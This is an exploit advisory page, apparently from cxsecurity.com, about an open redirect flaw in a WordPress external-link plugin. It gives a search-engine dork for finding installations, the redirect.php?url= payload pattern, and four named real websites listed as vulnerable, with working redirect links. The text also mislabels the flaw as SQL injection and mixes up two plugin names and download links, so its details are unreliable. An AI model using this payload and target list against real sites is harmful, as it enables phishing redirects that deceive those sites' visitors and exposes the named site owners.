WordPress WP-JS-External-Link-Info Plugins 2.2.0 Open Redirection

2019.02.18
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-601

#################################################################### # Exploit Title : WordPress WP-JS-External-Link-Info Plugins 2.2.0 Open Redirection # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 16/02/2019 # Vendor Homepage : finewebdev.com # Software Download Link : downloads.wordpress.org/plugin/wp-external-links.1.81.zip downloads.wordpress.org/plugin/wp-external-links.2.2.0.zip # Software Information Link : wordpress.org/plugins/wp-external-links/ # Software Version : 1.21 - 1.81 - 2.2.0 and all previous versions. # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Google Dorks : inurl:''/wp-content/plugins/wp-js-external-link-info/'' # Vulnerability Type : CWE-601: URL Redirection to Untrusted Site ('Open Redirect') # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos # Reference Link : packetstormsecurity.com/files/151679/WordPress-WP-JS-External-Link-Info-2.2.0-Open-Redirection.html #################################################################### # Description about Software : *************************** “WP External Links (nofollow new tab seo)” is open source software. Manage external and internal links on your site. #################################################################### # Impact : *********** WordPress Plugin WP Js External Link Info is prone to an open redirect vulnerability because the application fails to properly verify user-supplied input. Exploiting this issue may allow attackers to redirect users to arbitrary web sites and conduct phishing attacks; other attacks are also possible. WordPress Plugin WP Js External Link Info version 1.21 - 1.81 and 2.2.0 is vulnerable; prior versions may also be affected. #################################################################### # SQL Injection Exploit : ********************** /wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://{OPEN-REDIRECTION}.gov #################################################################### # Example Vulnerable Sites : ************************* [+] new.0points.com/wp/wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://cxsecurity.com [+] foerderverein-bergbad.de/wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://packetstormsecurity.com [+] wataaah.de/wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://www.cyberizm.org/ [+] blogoprage.ru/wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://exploit4arab.org #################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ####################################################################

References:

packetstormsecurity.com/files/151679/WordPress-WP-JS-External-Link-Info-2.2.0-Open-Redirection.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top